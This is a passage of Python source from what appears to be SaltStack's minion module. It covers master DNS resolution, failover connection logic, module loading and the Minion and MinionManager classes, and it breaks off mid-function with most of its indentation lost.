try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
                err = ('Master address: \'{0}\' could not be resolved. Invalid '
                       'or unresolvable address. Set \'syndic_master\' value in '
                       'minion config.').format(master)
            else:
                err = ('Master address: \'{0}\' could not be resolved. Invalid '
                       'or unresolvable address. Set \'master\' value in '
                       'minion config.').format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
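# Illustration only (hypothetical values, not an API contract): for
#   opts = {'master': 'salt.example.com', 'master_port': 4506,
#           'ipv6': False, 'retry_dns': 30, 'file_client': 'remote'}
# resolve_dns() would return something like
#   {'master_ip': '203.0.113.10', 'master_uri': 'tcp://203.0.113.10:4506'},
# and falls back to 127.0.0.1 if the hostname cannot be resolved while
# fallback=True.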
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
        mode: anything os.makedirs would accept as mode.
        uid: the uid to set. If not given, None, or -1, no changes are
             made. The same applies if the directory is already owned by
             this uid. Must be an int. Works only on Unix-like systems.
        gid: the gid to set. If not given, None, or -1, no changes are
             made. The same applies if the directory is already owned by
             this gid. Must be an int. Works only on Unix-like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Carbon',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Carbon release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Carbon',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
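# Rough sketch of the split above with a hypothetical publish payload:
#   load_args_and_kwargs(func, ['foo', {'__kwarg__': True, 'refresh': True}])
# yields _args == ['foo'] and _kwargs == {'refresh': True} (provided func
# accepts 'refresh' or **kwargs); when func accepts **kwargs and publish data
# is supplied, the data is also packed in as __pub_* keyword arguments.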
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
    and save its result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
opts['__master_func_evaluated'] = True
except TypeError:
log.error("Failed to evaluate master address from module '{0}'".format(
opts['master']))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
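# Illustrative example (module and function names are hypothetical): with
#   master_type: func
#   master: my_master_lookup.get_master
# in the minion config, salt.loader.raw_mod loads the custom module
# 'my_master_lookup' and the return value of get_master() becomes the
# master address.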
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['master_list']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                # If failover is set, the minion has to fail over on DNS
                # errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
last_exc = None
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
                        msg = ('No master could be reached or all masters '
                               'denied the minion\'s connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
if self.opts.get('master_type') != 'disable':
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
    Create a multi-minion interface. This creates as many minions as are
    defined in the master option and binds each minion object to a
    respective master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
minion = Minion(s_opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
        # Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
            signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=['__master_alive'])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
'__master_alive_{0}'.format(self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
'__master_failback':
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job('__master_failback', persist=True)
else:
self.schedule.delete_job('__master_alive_{0}'.format(self.opts['master']), persist=True)
self.schedule.delete_job('__master_failback', persist=True)
self.grains_cache = self.opts['grains']
self.ready = True
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
                    'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1}); '
                    'both must be positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
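    # Illustration (hypothetical config values): return_retry_timer: 5 with
    # return_retry_timer_max: 10 picks a random timer in [5, 10]; without
    # return_retry_timer_max the configured return_retry_timer is used as-is.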
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
